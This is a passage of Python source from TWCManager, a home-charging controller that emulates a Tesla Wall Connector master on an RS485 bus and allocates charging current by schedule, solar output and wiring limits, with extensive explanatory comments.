timeLastGreenEnergyCheck, greenEnergyAmpsOffset, \
slaveTWCRoundRobin, spikeAmpsToCancel6ALimit, \
chargeNowAmps, chargeNowTimeEnd, minAmpsPerTWC
now = time.time()
self.timeLastRx = now
self.reportedAmpsMax = ((heartbeatData[1] << 8) + heartbeatData[2]) / 100
self.reportedAmpsActual = ((heartbeatData[3] << 8) + heartbeatData[4]) / 100
self.reportedState = heartbeatData[0]
# self.lastAmpsOffered is initialized to -1.
# If we find it at that value, set it to the current value reported by the
# TWC.
if(self.lastAmpsOffered < 0):
self.lastAmpsOffered = self.reportedAmpsMax
# Keep track of the amps the slave is actually using and the last time it
# changed by more than 0.8A.
# Also update self.reportedAmpsActualSignificantChangeMonitor if it's
# still set to its initial value of -1.
if(self.reportedAmpsActualSignificantChangeMonitor < 0
or abs(self.reportedAmpsActual - self.reportedAmpsActualSignificantChangeMonitor) > 0.8
):
self.timeReportedAmpsActualChangedSignificantly = now
self.reportedAmpsActualSignificantChangeMonitor = self.reportedAmpsActual
ltNow = time.localtime()
hourNow = ltNow.tm_hour + (ltNow.tm_min / 60)
yesterday = ltNow.tm_wday - 1
if(yesterday < 0):
yesterday += 7
# Check if it's time to resume tracking green energy.
if(nonScheduledAmpsMax != -1 and hourResumeTrackGreenEnergy > -1
and hourResumeTrackGreenEnergy == hourNow
):
nonScheduledAmpsMax = -1
save_settings()
# Check if we're within the hours we must use scheduledAmpsMax instead
# of nonScheduledAmpsMax
blnUseScheduledAmps = 0
if(scheduledAmpsMax > 0
and
scheduledAmpsStartHour > -1
and
scheduledAmpsEndHour > -1
and
scheduledAmpsDaysBitmap > 0
):
if(scheduledAmpsStartHour > scheduledAmpsEndHour):
# We have a time like 8am to 7am which we must interpret as the
# 23-hour period after 8am or before 7am. Since this case always
# crosses midnight, we only ensure that scheduledAmpsDaysBitmap
# is set for the day the period starts on. For example, if
# scheduledAmpsDaysBitmap says only schedule on Monday, 8am to
# 7am, we apply scheduledAmpsMax from Monday at 8am to Monday at
# 11:59pm, and on Tuesday at 12am to Tuesday at 6:59am.
if(
(
hourNow >= scheduledAmpsStartHour
and
(scheduledAmpsDaysBitmap & (1 << ltNow.tm_wday))
)
or
(
hourNow < scheduledAmpsEndHour
and
(scheduledAmpsDaysBitmap & (1 << yesterday))
)
):
blnUseScheduledAmps = 1
else:
# We have a time like 7am to 8am which we must interpret as the
# 1-hour period between 7am and 8am.
if(hourNow >= scheduledAmpsStartHour
and hourNow < scheduledAmpsEndHour
and (scheduledAmpsDaysBitmap & (1 << ltNow.tm_wday))
):
blnUseScheduledAmps = 1
if(chargeNowTimeEnd > 0 and chargeNowTimeEnd < now):
# We're beyond the one-day period where we want to charge at
# chargeNowAmps, so reset the chargeNow variables.
chargeNowAmps = 0
chargeNowTimeEnd = 0
if(chargeNowTimeEnd > 0 and chargeNowAmps > 0):
# We're still in the one-day period where we want to charge at
# chargeNowAmps, ignoring all other charging criteria.
maxAmpsToDivideAmongSlaves = chargeNowAmps
if(debugLevel >= 10):
print(time_now() + ': Charge at chargeNowAmps %.2f' % (chargeNowAmps))
elif(blnUseScheduledAmps):
# We're within the scheduled hours that we need to provide a set
# number of amps.
maxAmpsToDivideAmongSlaves = scheduledAmpsMax
else:
if(nonScheduledAmpsMax > -1):
maxAmpsToDivideAmongSlaves = nonScheduledAmpsMax
elif(now - timeLastGreenEnergyCheck > 60):
timeLastGreenEnergyCheck = now
# Don't bother to check solar generation before 6am or after
# 8pm. Sunrise in most U.S. areas varies from a little before
# 6am in Jun to almost 7:30am in Nov before the clocks get set
# back an hour. Sunset can be ~4:30pm to just after 8pm.
if(ltNow.tm_hour < 6 or ltNow.tm_hour >= 20):
maxAmpsToDivideAmongSlaves = 0
else:
queue_background_task({'cmd':'checkGreenEnergy'})
# Use backgroundTasksLock to prevent the background thread from changing
# the value of maxAmpsToDivideAmongSlaves after we've checked the value
# is safe to use but before we've used it.
backgroundTasksLock.acquire()
if(maxAmpsToDivideAmongSlaves > wiringMaxAmpsAllTWCs):
# Never tell the slaves to draw more amps than the physical charger
# wiring can handle.
if(debugLevel >= 1):
print(time_now() +
" ERROR: maxAmpsToDivideAmongSlaves " + str(maxAmpsToDivideAmongSlaves) +
" > wiringMaxAmpsAllTWCs " + str(wiringMaxAmpsAllTWCs) +
".\nSee notes above wiringMaxAmpsAllTWCs in the 'Configuration parameters' section.")
maxAmpsToDivideAmongSlaves = wiringMaxAmpsAllTWCs
# Determine how many cars are charging and how many amps they're using
numCarsCharging = 1
desiredAmpsOffered = maxAmpsToDivideAmongSlaves
for slaveTWC in slaveTWCRoundRobin:
if(slaveTWC.TWCID != self.TWCID):
# To avoid exceeding maxAmpsToDivideAmongSlaves, we must
# subtract the actual amps being used by this TWC from the amps
# we will offer.
desiredAmpsOffered -= slaveTWC.reportedAmpsActual
if(slaveTWC.reportedAmpsActual >= 1.0):
numCarsCharging += 1
# Allocate this slave a fraction of maxAmpsToDivideAmongSlaves divided
# by the number of cars actually charging.
fairShareAmps = int(maxAmpsToDivideAmongSlaves / numCarsCharging)
if(desiredAmpsOffered > fairShareAmps):
desiredAmpsOffered = fairShareAmps
if(debugLevel >= 10):
print("desiredAmpsOffered reduced from " + str(maxAmpsToDivideAmongSlaves)
+ " to " + str(desiredAmpsOffered)
+ " with " + str(numCarsCharging)
+ " cars charging.")
backgroundTasksLock.release()
minAmpsToOffer = minAmpsPerTWC
if(self.minAmpsTWCSupports > minAmpsToOffer):
minAmpsToOffer = self.minAmpsTWCSupports
if(desiredAmpsOffered < minAmpsToOffer):
if(maxAmpsToDivideAmongSlaves / numCarsCharging > minAmpsToOffer):
# There is enough power available to give each car
# minAmpsToOffer, but currently-charging cars are leaving us
# less power than minAmpsToOffer to give this car.
#
# minAmpsToOffer is based on minAmpsPerTWC which is
# user-configurable, whereas self.minAmpsTWCSupports is based on
# the minimum amps TWC must be set to reliably start a car
# charging.
#
# Unfortunately, we can't tell if a car is plugged in or wanting
# to charge without offering it minAmpsTWCSupports. As the car
# gradually starts to charge, we will see it using power and
# tell other TWCs on the network to use less power. This could
# cause the sum of power used by all TWCs to exceed
# wiringMaxAmpsAllTWCs for a few seconds, but I don't think
# exceeding by up to minAmpsTWCSupports for such a short period
# of time will cause problems.
if(debugLevel >= 10):
print("desiredAmpsOffered increased from " + str(desiredAmpsOffered)
+ " to " + str(self.minAmpsTWCSupports)
+ " (self.minAmpsTWCSupports)")
desiredAmpsOffered = self.minAmpsTWCSupports
else:
# There is not enough power available to give each car
# minAmpsToOffer, so don't offer power to any cars. Alternately,
# we could charge one car at a time and switch cars
# periodically, but I'm not going to try to implement that.
#
# Note that 5A is the lowest value you can set using the Tesla car's
# main screen, so lower values might have some adverse affect on the
# car. I actually tried lower values when the sun was providing
# under 5A of power and found the car would occasionally set itself
# to state 03 and refuse to charge until you re-plugged the charger
# cable. Clicking "Start charging" in the car's UI or in the phone
# app would not start charging.
#
# A 5A charge only delivers ~3 miles of range to the car per hour,
# but it forces the car to remain "on" at a level that it wastes
# some power while it's charging. The lower the amps, the more power
# is wasted. This is another reason not to go below 5A.
#
# So if there isn't at least 5A of power available, pass 0A as the
# desired value. This tells the car to stop charging and it will
# enter state 03 and go to sleep. You will hear the power relay in
# the TWC turn off. When desiredAmpsOffered trends above 6A again,
# it tells the car there's power.
# If a car is set to energy saver mode in the car's UI, the car
# seems to wake every 15 mins or so (unlocking or using phone app
# also wakes it) and next time it wakes, it will see there's power
# and start charging. Without energy saver mode, the car should
# begin charging within about 10 seconds of changing this value.
if(debugLevel >= 10):
print("desiredAmpsOffered reduced to 0 from " + str(desiredAmpsOffered)
+ " because maxAmpsToDivideAmongSlaves "
+ str(maxAmpsToDivideAmongSlaves)
+ " / numCarsCharging " + str(numCarsCharging)
+ " < minAmpsToOffer " + str(minAmpsToOffer))
desiredAmpsOffered = 0
if(
self.lastAmpsOffered > 0
and
(
now - self.timeLastAmpsOfferedChanged < 60
or
now - self.timeReportedAmpsActualChangedSignificantly < 60
or
self.reportedAmpsActual < 4.0
)
):
# We were previously telling the car to charge but now we want
# to tell it to stop. However, it's been less than a minute
# since we told it to charge or since the last significant
# change in the car's actual power draw or the car has not yet
# started to draw at least 5 amps (telling it 5A makes it
# actually draw around 4.18-4.27A so we check for
# self.reportedAmpsActual < 4.0).
#
# Once we tell the car to charge, we want to keep it going for
# at least a minute before turning it off again. concern is that
# yanking the power at just the wrong time during the
# start-charge negotiation could put the car into an error state
# where it won't charge again without being re-plugged. This
# concern is hypothetical and most likely could not happen to a
# real car, but I'd rather not take any chances with getting
# someone's car into a non-charging state so they're stranded
# when they need to get somewhere. Note that non-Tesla cars
# using third-party adapters to plug in are at a higher risk of
# encountering this sort of hypothetical problem.
#
# The other reason for this tactic is that in the minute we
# wait, desiredAmpsOffered might rise above 5A in which case we
# won't have to turn off the charger power at all. Avoiding too
# many on/off cycles preserves the life of the TWC's main power
# relay and may also prevent errors in the car that might be
# caused by turning its charging on and off too rapidly.
#
# Seeing self.reportedAmpsActual < 4.0 means the car hasn't
# ramped up to whatever level we told it to charge at last time.
# It may be asleep and take up to 15 minutes to wake up, see
# there's power, and start charging.
#
# Unfortunately, self.reportedAmpsActual < 4.0 can also mean the
# car is at its target charge level and may not accept power for
# days until the battery drops below a certain level. I can't
# think of a reliable way to detect this case. When the car
# stops itself from charging, we'll see self.reportedAmpsActual
# drop to near 0.0A and heartbeatData[0] becomes 03, but we can
# see the same 03 state when we tell the TWC to stop charging.
# We could record the time the car stopped taking power and
# assume it won't want more for some period of time, but we
# can't reliably detect if someone unplugged the car, drove it,
# and re-plugged it so it now needs power, or if someone plugged
# in a different car that needs power. Even if I see the car
# hasn't taken the power we've offered for the
# last hour, it's conceivable the car will reach a battery state
# where it decides it wants power the moment we decide it's safe
# to stop offering it. Thus, I think it's safest to always wait
# until the car has taken 5A for a minute before cutting power
# even if that means the car will charge for a minute when you
# first plug it in after a trip even at a time when no power
# should be available.
#
# One advantage of the above situation is that whenever you plug
# the car in, unless no power has been available since you
# unplugged, the charge port will turn green and start charging
# for a minute. This lets the owner quickly see that TWCManager
# is working properly each time they return home and plug in.
if(debugLevel >= 10):
print("Don't stop charging yet because: " +
'time - self.timeLastAmpsOfferedChanged ' +
str(int(now - self.timeLastAmpsOfferedChanged)) +
' < 60 or time - self.timeReportedAmpsActualChangedSignificantly ' +
str(int(now - self.timeReportedAmpsActualChangedSignificantly)) +
' < 60 or self.reportedAmpsActual ' + str(self.reportedAmpsActual) +
' < 4')
desiredAmpsOffered = minAmpsToOffer
else:
# We can tell the TWC how much power to use in 0.01A increments, but
# the car will only alter its power in larger increments (somewhere
# between 0.5 and 0.6A). The car seems to prefer being sent whole
# amps and when asked to adjust between certain values like 12.6A
# one second and 12.0A the next second, the car reduces its power
# use to ~5.14-5.23A and refuses to go higher. So it seems best to
# stick with whole amps.
desiredAmpsOffered = int(desiredAmpsOffered)
if(self.lastAmpsOffered == 0
and now - self.timeLastAmpsOfferedChanged < 60
):
# Keep charger off for at least 60 seconds before turning back
# on. See reasoning above where I don't turn the charger off
# till it's been on at least 60 seconds.
if(debugLevel >= 10):
print("Don't start charging yet because: " +
'self.lastAmpsOffered ' +
str(self.lastAmpsOffered) + " == 0 " +
'and time - self.timeLastAmpsOfferedChanged ' +
str(int(now - self.timeLastAmpsOfferedChanged)) +
" < 60")
desiredAmpsOffered = self.lastAmpsOffered
else:
# Mid Oct 2017, Tesla pushed a firmware update to their cars
# that seems to create the following bug:
# If you raise desiredAmpsOffered AT ALL from the car's current
# max amp limit, the car will drop its max amp limit to the 6A
# setting (5.14-5.23A actual use as reported in
# heartbeatData[2-3]). The odd fix to this problem is to tell
# the car to raise to at least spikeAmpsToCancel6ALimit for 5 or
# more seconds, then tell it to lower the limit to
# desiredAmpsOffered. Even 0.01A less than
# spikeAmpsToCancel6ALimit is not enough to cancel the 6A limit.
#
# I'm not sure how long we have to hold spikeAmpsToCancel6ALimit
# but 3 seconds is definitely not enough but 5 seconds seems to
# work. It doesn't seem to matter if the car actually hits
# spikeAmpsToCancel6ALimit of power draw. In fact, the car is
# slow enough to respond that even with 10s at 21A the most I've
# seen it actually draw starting at 6A is 13A.
if(debugLevel >= 10):
print('desiredAmpsOffered=' + str(desiredAmpsOffered) +
' spikeAmpsToCancel6ALimit=' + str(spikeAmpsToCancel6ALimit) +
' self.lastAmpsOffered=' + str(self.lastAmpsOffered) +
' self.reportedAmpsActual=' + str(self.reportedAmpsActual) +
' now - self.timeReportedAmpsActualChangedSignificantly=' +
str(int(now - self.timeReportedAmpsActualChangedSignificantly)))
if(
# If we just moved from a lower amp limit to
# a higher one less than spikeAmpsToCancel6ALimit.
(
desiredAmpsOffered < spikeAmpsToCancel6ALimit
and
desiredAmpsOffered > self.lastAmpsOffered
)
or
(
# ...or if we've been offering the car more amps than it's
# been using for at least 10 seconds, then we'll change the
# amps we're offering it. For some reason, the change in
# amps offered will get the car to up its amp draw.
#
# First, check that the car is drawing enough amps to be
# charging...
self.reportedAmpsActual > 2.0
and
# ...and car is charging at under spikeAmpsToCancel6ALimit.
# I think I've seen cars get stuck between spikeAmpsToCancel6ALimit
# and lastAmpsOffered, but more often a car will be limited
# to under lastAmpsOffered by its UI setting or by the
# charger hardware it has on board, and we don't want to
# keep reducing it to spikeAmpsToCancel6ALimit.
# If cars really are getting stuck above
# spikeAmpsToCancel6ALimit, I may need to implement a
# counter that tries spikeAmpsToCancel6ALimit only a
# certain number of times per hour.
(self.reportedAmpsActual <= spikeAmpsToCancel6ALimit)
and
# ...and car is charging at over two amps under what we
# want it to charge at. I have to use 2 amps because when
# offered, say 40A, the car charges at ~38.76A actual.
# Using a percentage instead of 2.0A doesn't work because
# 38.58/40 = 95.4% but 5.14/6 = 85.6%
(self.lastAmpsOffered - self.reportedAmpsActual) > 2.0
and
# ...and car hasn't changed its amp draw significantly in
# over 10 seconds, meaning it's stuck at its current amp
# draw.
now - self.timeReportedAmpsActualChangedSignificantly > 10
)
):
# We must set desiredAmpsOffered to a value that gets
# reportedAmpsActual (amps the car is actually using) up to
# a value near lastAmpsOffered. At the end of all these
# checks, we'll set lastAmpsOffered = desiredAmpsOffered and
# timeLastAmpsOfferedChanged if the value of lastAmpsOffered was
# actually changed.
if(self.lastAmpsOffered == spikeAmpsToCancel6ALimit
and now - self.timeLastAmpsOfferedChanged > 10):
# We've been offering the car spikeAmpsToCancel6ALimit
# for over 10 seconds but it's still drawing at least
# 2A less than spikeAmpsToCancel6ALimit. I saw this
# happen once when an error stopped the car from
# charging and when the error cleared, it was offered
# spikeAmpsToCancel6ALimit as the first value it saw.
# The car limited itself to 6A indefinitely. In this
# case, the fix is to offer it lower amps.
if(debugLevel >= 1):
print(time_now() + ': Car stuck when offered spikeAmpsToCancel6ALimit. Offering 2 less.')
desiredAmpsOffered = spikeAmpsToCancel6ALimit - 2.0
elif(now - self.timeLastAmpsOfferedChanged > 5):
# self.lastAmpsOffered hasn't gotten the car to draw
# enough amps for over 5 seconds, so try
# spikeAmpsToCancel6ALimit
desiredAmpsOffered = spikeAmpsToCancel6ALimit
else:
# Otherwise, don't change the value of lastAmpsOffered.
desiredAmpsOffered = self.lastAmpsOffered
# Note that the car should have no problem increasing max
# amps to any whole value over spikeAmpsToCancel6ALimit as
# long as it's below any upper limit manually set in the
# car's UI. One time when I couldn't get TWC to push the car
# over 21A, I found the car's UI had set itself to 21A
# despite setting it to 40A the day before. I have been
# unable to reproduce whatever caused that problem.
elif(desiredAmpsOffered < self.lastAmpsOffered):
# Tesla doesn't mind if we set a lower amp limit than the
# one we're currently using, but make sure we don't change
# limits more often than every 5 seconds. This has the side
# effect of holding spikeAmpsToCancel6ALimit set earlier for
# 5 seconds to make sure the car sees it.
if(debugLevel >= 10):
print('Reduce amps: time - self.timeLastAmpsOfferedChanged ' +
str(int(now - self.timeLastAmpsOfferedChanged)))
if(now - self.timeLastAmpsOfferedChanged < 5):
desiredAmpsOffered = self.lastAmpsOffered
# set_last_amps_offered does some final checks to see if the new
# desiredAmpsOffered is safe. It should be called after we've picked a
# final value for desiredAmpsOffered.
desiredAmpsOffered = self.set_last_amps_offered(desiredAmpsOffered)
# See notes in send_slave_heartbeat() for details on how we transmit
# desiredAmpsOffered and the meaning of the code in
# self.masterHeartbeatData[0].
#
# Rather than only sending desiredAmpsOffered when slave is sending code
# 04 or 08, it seems to work better to send desiredAmpsOffered whenever
# it does not equal self.reportedAmpsMax reported by the slave TWC.
# Doing it that way will get a slave charging again even when it's in
# state 00 or 03 which it swings between after you set
# desiredAmpsOffered = 0 to stop charging.
#
# I later found that a slave may end up swinging between state 01 and 03
# when desiredAmpsOffered == 0:
# S 032e 0.25/0.00A: 01 0000 0019 0000 M: 00 0000 0000 0000
# S 032e 0.25/6.00A: 03 0258 0019 0000 M: 05 0000 0000 0000
# S 032e 0.25/0.00A: 01 0000 0019 0000 M: 00 0000 0000 0000
# S 032e 0.25/6.00A: 03 0258 0019 0000 M: 05 0000 0000 0000
#
# While it's doing this, it's continuously opening and closing the relay
# on the TWC each second which makes an audible click and will wear out
# the relay. To avoid that problem, always send code 05 when
# desiredAmpsOffered == 0. In that case, slave's response should always
# look like this:
# S 032e 0.25/0.00A: 03 0000 0019 0000 M: 05 0000 0000 0000
if(self.reportedAmpsMax != desiredAmpsOffered
or desiredAmpsOffered == 0
):
desiredHundredthsOfAmps = int(desiredAmpsOffered * 100)
self.masterHeartbeatData = bytearray([(0x09 if self.protocolVersion == 2 else 0x05),
(desiredHundredthsOfAmps >> 8) & 0xFF,
desiredHundredthsOfAmps & 0xFF,
0x00,0x00,0x00,0x00,0x00,0x00])
else:
self.masterHeartbeatData = bytearray([0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00])
if(len(overrideMasterHeartbeatData) >= 7):
self.masterHeartbeatData = overrideMasterHeartbeatData
if(debugLevel >= 1):
self.print_status(heartbeatData)
def set_last_amps_offered(self, desiredAmpsOffered):
# self.lastAmpsOffered should only be changed using this sub.
global debugLevel
if(debugLevel >= 10):
print("set_last_amps_offered(TWCID=" + hex_str(self.TWCID) +
", desiredAmpsOffered=" + str(desiredAmpsOffered) + ")")
if(desiredAmpsOffered != self.lastAmpsOffered):
oldLastAmpsOffered = self.lastAmpsOffered
self.lastAmpsOffered = desiredAmpsOffered
# Set totalAmpsAllTWCs to the total amps all TWCs are actually using
# minus amps this TWC is using, plus amps this TWC wants to use.
totalAmpsAllTWCs = total_amps_actual_all_twcs() \
- self.reportedAmpsActual + self.lastAmpsOffered
if(totalAmpsAllTWCs > wiringMaxAmpsAllTWCs):
# totalAmpsAllTWCs would exceed wiringMaxAmpsAllTWCs if we
# allowed this TWC to use desiredAmpsOffered. Instead, try
# offering as many amps as will increase total_amps_actual_all_twcs()
# up to wiringMaxAmpsAllTWCs.
self.lastAmpsOffered = int(wiringMaxAmpsAllTWCs -
(total_amps_actual_all_twcs() - self.reportedAmpsActual))
if(self.lastAmpsOffered < self.minAmpsTWCSupports):
# Always offer at least minAmpsTWCSupports amps.
# See notes in receive_slave_heartbeat() beneath
# 'if(maxAmpsToDivideAmongSlaves / numCarsCharging > minAmpsToOffer):'
self.lastAmpsOffered = self.minAmpsTWCSupports
print("WARNING: Offering slave TWC %02X%02X %.1fA instead of " \
"%.1fA to avoid overloading wiring shared by all TWCs." % (
self.TWCID[0], self.TWCID[1], self.lastAmpsOffered, desiredAmpsOffered))
if(self.lastAmpsOffered > self.wiringMaxAmps):
# We reach this case frequently in some configurations, such as
# when two 80A TWCs share a 125A line. Therefore, don't print
# an error.
self.lastAmpsOffered = self.wiringMaxAmps
if(debugLevel >= 10):
print("Offering slave TWC %02X%02X %.1fA instead of " \
"%.1fA to avoid overloading the TWC rated at %.1fA." % (
self.TWCID[0], self.TWCID[1], self.lastAmpsOffered,
desiredAmpsOffered, self.wiringMaxAmps))
if(self.lastAmpsOffered != oldLastAmpsOffered):
self.timeLastAmpsOfferedChanged = time.time()
return self.lastAmpsOffered
#
# End TWCSlave class
#
##############################
##############################
#
# Begin global vars
#
data = ''
dataLen = 0
ignoredData = bytearray()
msg = bytearray()
msgLen = 0
lastTWCResponseMsg = None
overrideMasterHeartbeatData = b''
masterTWCID = ''
slaveHeartbeatData = bytearray([0x01,0x0F,0xA0,0x0F,0xA0,0x00,0x00,0x00,0x00])
numInitMsgsToSend = 10
msgRxCount = 0
timeLastTx = 0
slaveTWCs = {}
slaveTWCRoundRobin = []
idxSlaveToSendNextHeartbeat = 0
maxAmpsToDivideAmongSlaves = 0
scheduledAmpsMax = -1
scheduledAmpsStartHour = -1
scheduledAmpsEndHour = -1
scheduledAmpsDaysBitmap = 0x7F
chargeNowAmps = 0
chargeNowTimeEnd = 0
spikeAmpsToCancel6ALimit = 16
timeLastGreenEnergyCheck = 0
hourResumeTrackGreenEnergy = -1
kWhDelivered = 119
timeLastkWhDelivered = time.time()
timeLastkWhSaved = time.time()
# __FILE__ contains the path to the running script. Replace the script name with
# TWCManagerSettings.txt. This gives us a path that will always locate
# TWCManagerSettings.txt in the same directory as the script even when pwd does
# not match the script directory.
settingsFileName = re.sub(r'/[^/]+$', r'/TWCManagerSettings.txt', __file__)
nonScheduledAmpsMax = -1
timeLastHeartbeatDebugOutput = 0
webMsgPacked = ''
webMsgMaxSize = 300
webMsgResult = 0
timeTo0Aafter06 = 0
timeToRaise2A = 0
carApiLastErrorTime = 0
carApiBearerToken = ''
carApiRefreshToken = ''
carApiTokenExpireTime = time.time()
carApiLastStartOrStopChargeTime = 0
carApiVehicles = []
# Transient errors are ones that usually disappear if we retry the car API
# command a minute or less later.
# 'vehicle unavailable:' sounds like it implies the car is out of connection
# range, but I once saw it returned by drive_state after wake_up returned
# 'online'. In that case, the car is reacahble, but drive_state failed for some
# reason. Thus we consider it a transient error.
# Error strings below need only match the start of an error response such as:
# {'response': None, 'error_description': '',
# 'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}'}
carApiTransientErrors = ['upstream internal error', 'operation_timedout',
'vehicle unavailable']
# Define minutes between retrying non-transient errors.
carApiErrorRetryMins = 10
homeLat = 10000
homeLon = 10000
backgroundTasksQueue = queue.Queue()
backgroundTasksCmds = {}
backgroundTasksLock = threading.Lock()
ser = None
ser = serial.Serial(rs485Adapter, baud, timeout=0)
#
# End global vars
#
##############################
##############################
#
# Begin main program
#
load_settings()
# Create a background thread to handle tasks that take too long on the main
# thread. For a primer on threads in Python, see:
# http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/
backgroundTasksThread = threading.Thread(target=background_tasks_thread, args = ())
backgroundTasksThread.daemon = True
backgroundTasksThread.start()
# Create an IPC (Interprocess Communication) message queue that we can
# periodically check to respond to queries from the TWCManager web interface.
#
# These messages will contain commands like "start charging at 10A" or may ask
# for information like "how many amps is the solar array putting out".
#
# The message queue is identified by a numeric key. This script and the web
# interface must both use the same key. The "ftok" function facilitates creating
# such a key based on a shared piece of information that is not likely to
# conflict with keys chosen by any other process in the system.
#
# ftok reads the inode number of the file or directory pointed to by its first
# parameter. This file or dir must already exist and the permissions on it don't
# seem to matter. The inode of a particular file or dir is fairly unique but
# doesn't change often so it makes a decent choice for a key. We use the parent
# directory of the TWCManager script.
#
# The second parameter to ftok is a single byte that adds some additional
# uniqueness and lets you create multiple queues linked to the file or dir in
# the first param. We use 'T' for Tesla.
#
# If you can't get this to work, you can also set key = <some arbitrary number>
# and in the web interface, use the same arbitrary number. While that could
# conflict with another process, it's very unlikely to.
webIPCkey = sysv_ipc.ftok(re.sub('/[^/]+$', '/', __file__), ord('T'), True)
# Use the key to create a message queue with read/write access for all users.
webIPCqueue = sysv_ipc.MessageQueue(webIPCkey, sysv_ipc.IPC_CREAT, 0o666)
if(webIPCqueue == None):
print("ERROR: Can't create Interprocess Communication message queue to communicate with web interface.")
# After the IPC message queue is created, if you type 'sudo ipcs -q' on the
# command like, you should see something like:
# ------ Message Queues --------
# key msqid owner perms used-bytes messages
# 0x5402ed16 491520 pi 666 0 0
#
# Notice that we've created the only IPC message queue in the system. Apparently
# default software on the pi doesn't use IPC or if it does, it creates and
# deletes its message queues quickly.
#
# If you want to get rid of all queues because you created extras accidentally,
# reboot or type 'sudo ipcrm -a msg'. Don't get rid of all queues if you see
# ones you didn't create or you may crash another process.
# Find more details in IPC here:
# http://www.onlamp.com/pub/a/php/2004/05/13/shared_memory.html
print("TWC Manager starting as fake %s with id %02X%02X and sign %02X" \
% ( ("Master" if fakeMaster else "Slave"), \
ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(slaveSign)))
while True:
try:
# In this area, we always send a linkready message when we first start.
# Whenever there is no data available from other TWCs to respond to,
# we'll loop back to this point to send another linkready or heartbeat
# message. By only sending our periodic messages when no incoming
# message data is available, we reduce the chance that we will start
# transmitting a message in the middle of an incoming message, which
# would corrupt both messages.
# Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means
# less power used and less waste heat.
time.sleep(0.025)
now = time.time()
if(fakeMaster == 1):
# A real master sends 5 copies of linkready1 and linkready2 whenever
# it starts up, which we do here.
# It doesn't seem to matter if we send these once per second or once
# per 100ms so I do once per 100ms to get them over with.
if(numInitMsgsToSend > 5):
send_master_linkready1()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend -= 1
elif(numInitMsgsToSend > 0):
send_master_linkready2()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend = numInitMsgsToSend - 1
else:
# After finishing the 5 startup linkready1 and linkready2
# messages, master will send a heartbeat message to every slave
# it's received a linkready message from. Do that here.
# A real master would keep sending linkready messages periodically
# as long as no slave was connected, but since real slaves send
# linkready once every 10 seconds till they're connected to a
# master, we'll just wait for that.
if(time.time() - timeLastTx >= 1.0):
# It's been about a second since our last heartbeat.
if(len(slaveTWCRoundRobin) > 0):
slaveTWC = slaveTWCRoundRobin[idxSlaveToSendNextHeartbeat]
if(time.time() - slaveTWC.timeLastRx > 26):
# A real master stops sending heartbeats to a slave
# that hasn't responded for ~26 seconds. It may
# still send the slave a heartbeat every once in
# awhile but we're just going to scratch the slave
# from our little black book and add them again if
# they ever send us a linkready.
print(time_now() + ": WARNING: We haven't heard from slave " \
"%02X%02X for over 26 seconds. " \
"Stop sending them heartbeat messages." % \
(slaveTWC.TWCID[0], slaveTWC.TWCID[1]))
delete_slave(slaveTWC.TWCID)
else:
slaveTWC.send_master_heartbeat()
idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1
if(idxSlaveToSendNextHeartbeat >= len(slaveTWCRoundRobin)):
idxSlaveToSendNextHeartbeat = 0
time.sleep(0.1) # give slave time to respond
else:
# As long as a slave is running, it sends link ready messages every
# 10 seconds. They trigger any master on the network to handshake
# with the slave and the master then sends a status update from the
# slave every 1-3 seconds. Master's status updates trigger the slave
# to send back its own status update.
# As long as master has sent a status update within the last 10
# seconds, slaves don't send link ready.
# I've also verified that masters don't care if we stop sending link
# ready as long as we send status updates in response to master's
# status updates.
if(fakeMaster != 2 and time.time() - timeLastTx >= 10.0):
if(debugLevel >= 1):
print("Advertise fake slave %02X%02X with sign %02X is " \
"ready to link once per 10 seconds as long as master " \
"hasn't sent a heartbeat in the last 10 seconds." % \
(ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(slaveSign)))
send_slave_linkready()
########################################################################
# See if there's any message from the web interface.
# If the message is longer than msgMaxSize, MSG_NOERROR tells it to
# return what it can of the message and discard the rest.
# When no message is available, IPC_NOWAIT tells msgrcv to return
# msgResult = 0 and $! = 42 with description 'No message of desired
# type'.
# If there is an actual error, webMsgResult will be -1.
# On success, webMsgResult is the length of webMsgPacked.
try:
webMsgRaw = webIPCqueue.receive(False, 2)
if(len(webMsgRaw[0]) > 0):
webMsgType = webMsgRaw[1]
unpacked = struct.unpack('=LH', webMsgRaw[0][0:6])
webMsgTime = unpacked[0]
webMsgID = unpacked[1]
webMsg = webMsgRaw[0][6:len(webMsgRaw[0])]
if(debugLevel >= 1):
webMsgRedacted = webMsg
# Hide car password in web request to send password to Tesla
m = re.search(b'^(carApiEmailPassword=[^\n]+\n)', webMsg, re.MULTILINE)
if(m):
webMsgRedacted = m.group(1) + b'[HIDDEN]'
print(time_now() + ": Web query: '" + str(webMsgRedacted) + "', id " + str(webMsgID) +
", time " + str(webMsgTime) + ", type " + str(webMsgType))
webResponseMsg = ''
numPackets = 0
if(webMsg == b'getStatus'):
needCarApiBearerToken = False
if(carApiBearerToken == ''):
for i in range(0, len(slaveTWCRoundRobin)):
if(slaveTWCRoundRobin[i].protocolVersion == 2):
needCarApiBearerToken = True
webResponseMsg = (
"%.2f" % (maxAmpsToDivideAmongSlaves) +
'`' + "%.2f" % (wiringMaxAmpsAllTWCs) +
'`' + "%.2f" % (minAmpsPerTWC) +
'`' + "%.2f" % (chargeNowAmps) +
'`' + str(nonScheduledAmpsMax) +
'`' + str(scheduledAmpsMax) +
'`' + "%02d:%02d" % (int(scheduledAmpsStartHour),
int((scheduledAmpsStartHour % 1) * 60)) +
'`' + "%02d:%02d" % (int(scheduledAmpsEndHour),
int((scheduledAmpsEndHour % 1) * 60)) +
'`' + str(scheduledAmpsDaysBitmap) +
'`' + "%02d:%02d" % (int(hourResumeTrackGreenEnergy),
int((hourResumeTrackGreenEnergy % 1) * 60)) +
# Send 1 if we need an email/password entered for car api, otherwise send 0
'`' + ('1' if needCarApiBearerToken else '0') +
'`' + str(len(slaveTWCRoundRobin))
)
for i in range(0, len(slaveTWCRoundRobin)):
webResponseMsg += (
'`' + "%02X%02X" % (slaveTWCRoundRobin[i].TWCID[0],
slaveTWCRoundRobin[i].TWCID[1]) +
'~' + str(slaveTWCRoundRobin[i].maxAmps) +
